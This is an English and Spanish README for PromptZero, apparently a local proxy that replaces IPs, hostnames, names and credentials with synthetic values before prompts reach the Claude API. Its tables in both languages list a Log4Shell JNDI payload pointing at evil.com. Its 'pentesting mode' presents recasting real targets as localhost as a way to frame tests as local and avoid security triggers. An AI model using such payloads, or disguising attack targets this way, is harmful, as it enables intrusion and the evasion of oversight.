Versión en Español

██████╗ ██████╗  ██████╗ ███╗   ███╗██████╗ ████████╗    ███████╗███████╗██████╗  ██████╗
██╔══██╗██╔══██╗██╔═══██╗████╗ ████║██╔══██╗╚══██╔══╝    ╚══███╔╝██╔════╝██╔══██╗██╔═══██╗
██████╔╝██████╔╝██║   ██║██╔████╔██║██████╔╝   ██║          ███╔╝ █████╗  ██████╔╝██║   ██║
██╔═══╝ ██╔══██╗██║   ██║██║╚██╔╝██║██╔═══╝    ██║         ███╔╝  ██╔══╝  ██╔══██╗██║   ██║
██║     ██║  ██║╚██████╔╝██║ ╚═╝ ██║██║        ██║        ███████╗███████╗██║  ██║╚██████╔╝
╚═╝     ╚═╝  ╚═╝ ╚═════╝ ╚═╝     ╚═╝╚═╝        ╚═╝        ╚══════╝╚══════╝╚═╝  ╚═╝ ╚═════╝

Zero trace. Full answer. The model sees fiction. You receive reality.

PromptZero is a local, transparent proxy for the Claude API that detects and replaces sensitive data in your prompts before they leave your environment — then restores real values in the response. Your infrastructure, identities, and findings stay home. Always.

The Problem

You use AI to analyze logs, write pentest reports, review code, and summarize contracts. But the prompts you send can contain real IPs, real hostnames, real names, and real credentials.

That data goes to a third-party server. Every time.

You type:                          Claude receives (without PromptZero):
─────────────────────────────      ─────────────────────────────
"Analyze traffic from              "Analyze traffic from
 192.168.1.45 targeting             192.168.1.45 targeting
 db.prod.company.com                db.prod.company.com     ← your real infra
 Credentials: admin:P@ss1"          Credentials: admin:P@ss1"  ← your real creds

PromptZero fixes this.

How It Works

╔══════════════════════════════════════════════════════════════════════╗
║                        YOUR ENVIRONMENT                              ║
║                                                                      ║
║  ┌─────────────┐     ┌──────────────────────────────┐               ║
║  │  Your App   │────▶│         PromptZero            │               ║
║  │  Script     │     │       localhost:8000           │               ║
║  │  Agent      │◀────│                               │               ║
║  └─────────────┘     │  ① Detect  → PII, IPs, hosts │               ║
║                       │  ② Replace → synthetic data  │               ║
║                       │  ③ Forward → clean prompt    │               ║
║                       │  ④ Receive → AI response     │               ║
║                       │  ⑤ Restore → real values     │               ║
║                       └──────────────┬───────────────┘               ║
║                                      │                               ║
║         ✗ Real data NEVER            │  Only synthetic               ║
║           crosses this line          │  data crosses here            ║
╚══════════════════════════════════════│══════════════════════════════╝
                                       │
                              ┌────────▼────────┐
                              │    Claude API    │
                              │  (sees fiction,  │
                              │  answers facts)  │
                              └─────────────────┘
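
The five steps in the diagram can be sketched as a single round trip. This is a minimal illustration under stated assumptions, not PromptZero's actual code: it handles only IPv4 addresses, and `sanitize`, `restore`, `fake_model`, and `round_trip` are hypothetical names. `fake_model` stands in for the real upstream API call.

```python
import re

# Simple IPv4 matcher for illustration; it does not validate octet ranges.
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def sanitize(text, mapping):
    """Steps 1-2: detect IPv4 addresses and swap in 127.0.0.x stand-ins."""
    def swap(match):
        real = match.group(0)
        if real not in mapping:
            mapping[real] = f"127.0.0.{len(mapping) + 1}"
        return mapping[real]
    return IPV4.sub(swap, text)

def restore(text, mapping):
    """Step 5: put the real values back, matching whole addresses only."""
    reverse = {fake: real for real, fake in mapping.items()}
    return IPV4.sub(lambda m: reverse.get(m.group(0), m.group(0)), text)

def fake_model(prompt):
    """Steps 3-4 stand-in: a real proxy would call the upstream API here."""
    return f"Reviewed: {prompt}"

def round_trip(prompt):
    mapping = {}                      # real -> synthetic, kept locally
    clean = sanitize(prompt, mapping)
    reply = fake_model(clean)         # only `clean` leaves the environment
    return clean, restore(reply, mapping)

clean, answer = round_trip("Analyze traffic from 192.168.1.45 to 10.0.0.7")
print(clean)
print(answer)
```

Only the value of `clean` is handed to the model stand-in; the mapping never leaves the function.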

Before & After

YOUR PROMPT (real data)              WHAT CLAUDE SEES (synthetic)
══════════════════════════           ════════════════════════════════
192.168.1.45              ────▶      127.0.0.1
db.prod.company.com       ────▶      localhost.localdomain.1
admin@company.com         ────▶      user001@fakecorp.local
John Smith                ────▶      Alice Harrington          (NLP)
Acme Financial S.A.       ────▶      Globex Industries         (NLP)
+54 11 4444-5555          ────▶      +1-555-000-0001
DNI 28.456.123            ────▶      FAKE-ID-000001
sk-ant-api03-xxxxx...     ────▶      FAKE_TOKEN_0001_xxxxxxxx
${jndi:ldap://evil.com/x} ────▶      ${jndi:ldap://localhost.localdomain.2/x}


CLAUDE'S RESPONSE (synthetic)        YOU RECEIVE (real data restored)
════════════════════════════         ═════════════════════════════════
"127.0.0.1 shows signs    ────▶      "192.168.1.45 shows signs
 of lateral movement to               of lateral movement to
 localhost.localdomain.1"             db.prod.company.com"

What Gets Protected

Data Type	Real → Synthetic	Detection
IPv4 address	`203.0.113.50` → `127.0.0.1`	Regex
IPv6 address	`2001:db8::1` → `::1`	Regex
Hostname / FQDN	`vpn.corp.com` → `localhost.localdomain.1`	Regex
URL	`https://api.corp.com/v2` → `https://localhost.localdomain.2/v2`	Regex
host:port	`db.internal:5432` → `localhost.localdomain.3:5432`	Regex
Email	`john@corp.com` → `user001@fakecorp.local`	Regex + NLP
Phone	`+54 11 4444-5555` → `+1-555-000-0001`	Regex + NLP
Person name	`John Smith` → `Alice Harrington`	NLP (spaCy)
Organization	`Acme Corp S.A.` → `Globex Industries`	NLP (spaCy)
National ID / DNI	`28.456.123` → `FAKE-ID-000001`	NLP (Presidio)
Passport	`AAB123456` → `XX0000001`	NLP (Presidio)
SSN	`123-45-6789` → `000-00-0001`	Regex + NLP
Credit card	`4111 1111 1111 1234` → `4111-1111-1111-0001`	Regex + NLP
IBAN	`GB29NWBK60161331926819` → `FAKEIBAN000...`	NLP
API key / Token	`sk-ant-api03-xxxxxx...` → `FAKE_TOKEN_0001_xxxxxxxx`	Regex

Pentesting mode: IPs map to 127.0.0.x and hostnames to localhost.localdomain.x — this frames your tests as local, avoids WAF/IDS triggers, and is accurate since you're running tests from a controlled environment anyway.
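
One way to produce the 127.0.0.x and localhost.localdomain.x values is a pair of counters, one per data type. The sketch below is an assumption about how such an allocator could look, not the code in sanitizer.py; the class name `SyntheticAllocator` and its methods are hypothetical. Note that past 255 addresses this version rolls over into 127.0.1.0, which is still inside the loopback range.

```python
import ipaddress
from itertools import count

class SyntheticAllocator:
    """Hands out stable loopback-style stand-ins for real IPs and hostnames."""

    def __init__(self):
        self._ip_counter = count(1)
        self._host_counter = count(1)
        self._ips = {}
        self._hosts = {}

    def ip(self, real):
        # Same real address always gets the same synthetic address.
        if real not in self._ips:
            offset = next(self._ip_counter)
            self._ips[real] = str(ipaddress.IPv4Address("127.0.0.0") + offset)
        return self._ips[real]

    def host(self, real):
        # Hostnames are case-insensitive, so normalise before lookup.
        key = real.lower()
        if key not in self._hosts:
            self._hosts[key] = f"localhost.localdomain.{next(self._host_counter)}"
        return self._hosts[key]

alloc = SyntheticAllocator()
print(alloc.ip("203.0.113.50"), alloc.host("vpn.corp.com"))
```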

Architecture

promptzero/
├── main.py          ← FastAPI proxy server (drop-in for api.anthropic.com)
├── sanitizer.py     ← Detection engine: NLP (Presidio+spaCy) + Regex layers
├── setup.sh         ← One-command setup
├── requirements.txt
├── .env.example
└── examples/
    ├── document_summary/   ← Summarize PDF/DOCX/TXT with PII protection
    └── pentest_report/     ← Generate full pentest reports from findings JSON

Detection layers

Text input
    │
    ├─▶ [ NLP Layer — Presidio + spaCy ]
    │     PERSON, ORGANIZATION, PHONE, EMAIL,
    │     CREDIT_CARD, IBAN, SSN, PASSPORT,
    │     NATIONAL_ID, URL, IP_ADDRESS
    │
    ├─▶ [ Regex Layer — network & infra ]
    │     IPv4, IPv6, hostnames, host:port,
    │     long tokens/API keys, URLs
    │
    └─▶ [ Merge & deduplicate by span ]
          └─▶ Replace real → synthetic
                └─▶ Store in session mapping table
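
The "merge & deduplicate by span" step matters because the two layers often flag the same or overlapping text, for example a hostname inside a URL. A minimal sketch of one possible policy (longest span wins, NLP wins ties) follows; the `Span` type, `span_of`, and `merge_spans` are hypothetical names, and the real merge rules may differ.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Span:
    start: int
    end: int      # exclusive
    label: str
    source: str   # "nlp" or "regex"

def span_of(text, needle, label, source):
    """Helper for the demo: locate the first occurrence of `needle`."""
    start = text.index(needle)
    return Span(start, start + len(needle), label, source)

def merge_spans(spans):
    """Keep the longest span in each overlapping group, in text order."""
    # Longest first; ties broken by position, then source ("nlp" < "regex").
    ordered = sorted(
        spans, key=lambda s: (-(s.end - s.start), s.start, s.source, s.label)
    )
    kept = []
    for s in ordered:
        # Accept a span only if it does not overlap anything already kept.
        if all(s.end <= k.start or s.start >= k.end for k in kept):
            kept.append(s)
    return sorted(kept, key=lambda s: s.start)

text = "Contact john@corp.com at https://api.corp.com/v2"
found = [
    span_of(text, "john@corp.com", "EMAIL", "nlp"),
    span_of(text, "john@corp.com", "EMAIL", "regex"),        # duplicate
    span_of(text, "corp.com", "HOSTNAME", "regex"),          # inside the email
    span_of(text, "https://api.corp.com/v2", "URL", "regex"),
    span_of(text, "api.corp.com", "HOSTNAME", "regex"),      # inside the URL
]
merged = merge_spans(found)
print([(s.label, text[s.start:s.end]) for s in merged])
```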

Session mapping

Each conversation gets a session-scoped bidirectional mapping table. The same real value always maps to the same synthetic value within a session — so your conversation stays coherent end-to-end.

Session: "pentest-acmecorp-2024"
─────────────────────────────────────────────────
Real value                   Synthetic value
─────────────────────────────────────────────────
192.168.1.45        ←──────▶  127.0.0.1
db.prod.acme.com    ←──────▶  localhost.localdomain.1
John Smith          ←──────▶  Alice Harrington
admin@acme.com      ←──────▶  user001@fakecorp.local
─────────────────────────────────────────────────
           Stored locally. Never sent anywhere.
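
A session-scoped bidirectional table can be sketched with two dictionaries per session. This is an illustrative assumption rather than the project's implementation; `SessionMapping` and `sessions` are hypothetical names. Restoration is done in one regex pass with the longest synthetic values tried first, so that `127.0.0.1` is not substituted inside `127.0.0.10`.

```python
import re
from collections import defaultdict

class SessionMapping:
    """Bidirectional real <-> synthetic table for one conversation."""

    def __init__(self):
        self.real_to_fake = {}
        self.fake_to_real = {}

    def add(self, real, fake):
        # A real value seen before keeps its original synthetic value.
        existing = self.real_to_fake.get(real)
        if existing is not None:
            return existing
        self.real_to_fake[real] = fake
        self.fake_to_real[fake] = real
        return fake

    def restore(self, text):
        if not self.fake_to_real:
            return text
        # Longest alternatives first so shorter prefixes cannot shadow them.
        fakes = sorted(self.fake_to_real, key=len, reverse=True)
        pattern = re.compile("|".join(re.escape(f) for f in fakes))
        return pattern.sub(lambda m: self.fake_to_real[m.group(0)], text)

# One table per session id, created on first use and held in memory only.
sessions = defaultdict(SessionMapping)

table = sessions["pentest-acmecorp-2024"]
table.add("192.168.1.45", "127.0.0.1")
table.add("10.0.0.9", "127.0.0.10")
table.add("db.prod.acme.com", "localhost.localdomain.1")
print(table.restore("127.0.0.10 and 127.0.0.1 reach localhost.localdomain.1"))
```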

Quick Start

# Clone
git clone https://github.com/openbash/promptzero
cd promptzero

# Setup (installs deps + downloads spaCy NLP model)
./setup.sh

# Configure
cp .env.example .env
# → edit .env and add your ANTHROPIC_API_KEY

# Run
python main.py
# Listening on http://localhost:8000

Use ./setup.sh small for a lighter spaCy model (~12 MB vs ~560 MB). The small model is faster but less accurate for person/org detection.

Usage

PromptZero is a drop-in replacement for https://api.anthropic.com. Point your client's base URL at the proxy; everything else stays the same.

Python SDK

import anthropic

client = anthropic.Anthropic(
    api_key="your-api-key",
    base_url="http://localhost:8000",   # ← only change
)

message = client.messages.create(
    model="claude-opus-4-6",
    max_tokens=1024,
    messages=[{
        "role": "user",
        "content": "Analyze traffic from 10.0.1.42 to db.prod.corp:5432. User: john@corp.com"
    }],
    extra_headers={"x-session-id": "my-session"},  # keeps mapping consistent
)

print(message.content[0].text)
# → Real IPs and email are restored in the response

curl

curl http://localhost:8000/v1/messages \
  -H "x-api-key: $ANTHROPIC_API_KEY" \
  -H "x-session-id: my-session" \
  -H "anthropic-version: 2023-06-01" \
  -H "content-type: application/json" \
  -d '{
    "model": "claude-opus-4-6",
    "max_tokens": 1024,
    "messages": [{
      "role": "user",
      "content": "The payload hit 203.0.113.5:8443 — what does this CVE-2024-21762 exploit look like?"
    }]
  }'

Management endpoints

# Health check
GET  /health

# Inspect what PromptZero mapped in a session (debug)
GET  /sessions/{session_id}/mappings

# Reset a session's mapping table
DELETE /sessions/{session_id}
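
These endpoints can also be called from Python using only the standard library. The sketch below assumes the proxy is listening on http://localhost:8000 as in Quick Start; the helper names are hypothetical, and because the response format is not described here, `send` simply returns the status code and raw body text.

```python
import urllib.request
from urllib.parse import quote

BASE_URL = "http://localhost:8000"  # assumed default from Quick Start

def _request(method, path):
    """Build (but do not send) a request for a management endpoint."""
    return urllib.request.Request(BASE_URL + path, method=method)

def health_request():
    return _request("GET", "/health")

def mappings_request(session_id):
    # Percent-encode the id so characters like "/" cannot change the path.
    return _request("GET", f"/sessions/{quote(session_id, safe='')}/mappings")

def reset_request(session_id):
    return _request("DELETE", f"/sessions/{quote(session_id, safe='')}")

def send(request, timeout=5.0):
    """Send a prepared request; returns (status code, body text)."""
    with urllib.request.urlopen(request, timeout=timeout) as resp:
        return resp.status, resp.read().decode("utf-8")

# Example (requires a running proxy):
#   status, body = send(mappings_request("my-session"))
#   send(reset_request("my-session"))
```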

Examples

Document Summary

Summarize any document (PDF, DOCX, TXT, log) with full PII protection.

cd examples/document_summary
pip install -r requirements.txt

python summarize.py contract.pdf
python summarize.py incident_report.docx --mode executive --lang es
python summarize.py access.log --mode technical

Pentest Report Generator

Generate professional pentest reports from a structured findings JSON. IPs, hostnames, client names, credentials, and payloads are all protected.

cd examples/pentest_report
pip install -r requirements.txt

# Full technical report
python report.py findings.json

# Executive summary in Spanish
python report.py findings.json --mode executive --lang es --out ejecutivo.md

# Remediation checklist
python report.py findings.json --mode remediation --out fixes.md

# Protect short passwords the proxy might miss
python report.py findings.json --protect "P@ssw0rd1" "Summer2023!"

See examples/pentest_report/sample_findings.json for a complete example with 6 realistic findings (critical → low).

Why PromptZero?

                    SaaS vendors           PromptZero
                    (Private AI,           (this project)
                     Protecto, etc.)
                    ──────────────────     ──────────────────
Data leaves env?    YES, goes to them      NO, stays local
Cost                Per-volume billing     Free / open source
Works offline       No                     Yes
Pentesting-aware    No                     Yes (127.0.0.x)
Customizable        Limited                Full source access
Auditable           No                     Yes
Paradox-free        No*                    Yes

* Sending private data to a third party so they can "protect" it
  before sending it to another third party is not privacy.

About OpenBash

PromptZero is a project by OpenBash.com, a community built by pentesters, for pentesters.

We build open-source security tools that help the community work smarter, stay protected, and keep sensitive data where it belongs: at home.

If this tool helps you, share it. If you find a bug, open an issue. If you improve it, send a PR.

Contributing

# Fork → clone → branch
git checkout -b feature/my-improvement

# Make changes, test manually
python main.py &
# test your changes against localhost:8000

# Submit PR to main

Ideas for contributions:

Additional language support (spaCy models for ES, PT, FR, DE)
Persistent session storage (SQLite / Redis)
More examples (log_analyzer, code_reviewer, nessus_parser)
CLI wrapper (promptzero "your prompt here")
Docker image

License

MIT — free to use, modify, distribute. Attribution appreciated but not required.

Versión en Español

¿Qué es PromptZero?

PromptZero es un proxy local y transparente para la API de Claude que detecta y reemplaza datos sensibles en tus prompts antes de que salgan de tu entorno — y restaura los valores reales en la respuesta. Tu infraestructura, identidades y hallazgos siempre se quedan en casa.

Slogan: Cero rastro. Respuesta real.

El Problema

Usás IA para analizar logs, escribir reportes de pentesting, revisar código, resumir contratos. Pero cada prompt que enviás contiene IPs reales, hostnames reales, nombres reales, credenciales reales.

Esos datos van a un servidor de terceros. Siempre.

PromptZero lo resuelve interceptando cada request localmente, reemplazando los datos sensibles por equivalentes sintéticos consistentes, y restaurando los valores reales en la respuesta.

Cómo Funciona

TU ENTORNO
┌─────────────────────────────────────────────────────────────┐
│                                                             │
│  Tu App/Script ──▶ PromptZero (localhost:8000)              │
│       ▲                │                                    │
│       │                ① Detectar PII, IPs, hosts           │
│       │                ② Reemplazar con datos ficticios      │
│       └────────────────③ Reenviar prompt limpio             │
│                        ④ Recibir respuesta de Claude        │
│                        ⑤ Restaurar valores reales           │
│                                                             │
│         ✗ Los datos reales NUNCA cruzan este límite         │
└───────────────────────────────────┬─────────────────────────┘
                                    │ Solo datos sintéticos
                             ┌──────▼──────┐
                             │  Claude API  │
                             │ (ve ficción, │
                             │ responde OK) │
                             └─────────────┘

Datos que protege

Tipo	Dato real	Dato sintético
IP (pentesting)	`192.168.1.45`	`127.0.0.1`
Hostname	`db.prod.empresa.com`	`localhost.localdomain.1`
Email	`juan@empresa.com`	`user001@fakecorp.local`
Nombre / Apellido	`Juan García`	`Alice Harrington`
Empresa	`Empresa XYZ S.A.`	`Globex Industries`
Teléfono	`+54 11 4444-5555`	`+1-555-000-0001`
DNI / Documento	`28.456.123`	`FAKE-ID-000001`
Tarjeta de crédito	`4111 1111 1111 1234`	`4111-1111-1111-0001`
Token / API key	`sk-ant-api03-xxx...`	`FAKE_TOKEN_0001_xxxxxxxx`
Payload con host	`${jndi:ldap://evil.com}`	`${jndi:ldap://localhost.localdomain.2}`

Modo pentesting: Las IPs se mapean a 127.0.0.x y los hostnames a localhost.localdomain.x — esto enmarca los tests como locales, evita alertas de WAF/IDS y es técnicamente correcto ya que las pruebas se realizan desde infraestructura controlada.

Inicio rápido

git clone https://github.com/openbash/promptzero
cd promptzero

./setup.sh          # instala todo + modelo NLP (~560 MB)
./setup.sh small    # modelo más liviano (~12 MB, menos preciso)

cp .env.example .env
# → agregar ANTHROPIC_API_KEY

python main.py

Solo cambiás base_url en tu SDK:

client = anthropic.Anthropic(
    api_key="tu-api-key",
    base_url="http://localhost:8000",  # ← único cambio
)

Ejemplos incluidos

# Resumir un documento con PII protegida
cd examples/document_summary
python summarize.py contrato.pdf --lang es

# Generar reporte de pentesting desde findings.json
cd examples/pentest_report
python report.py findings.json --mode executive --lang es --out reporte.md
python report.py findings.json --protect "P@ssw0rd1" "token_secreto"

Sobre OpenBash

PromptZero es un proyecto de OpenBash.com — una comunidad construida de pentesters para pentesters.

Construimos herramientas de seguridad open source para que la comunidad pueda trabajar mejor, mantenerse protegida y conservar sus datos sensibles donde corresponde: en casa.

Si esta herramienta te sirve, compartila. Si encontrás un bug, abrí un issue. Si la mejorás, mandá un PR.

Made with ♥ by the OpenBash community
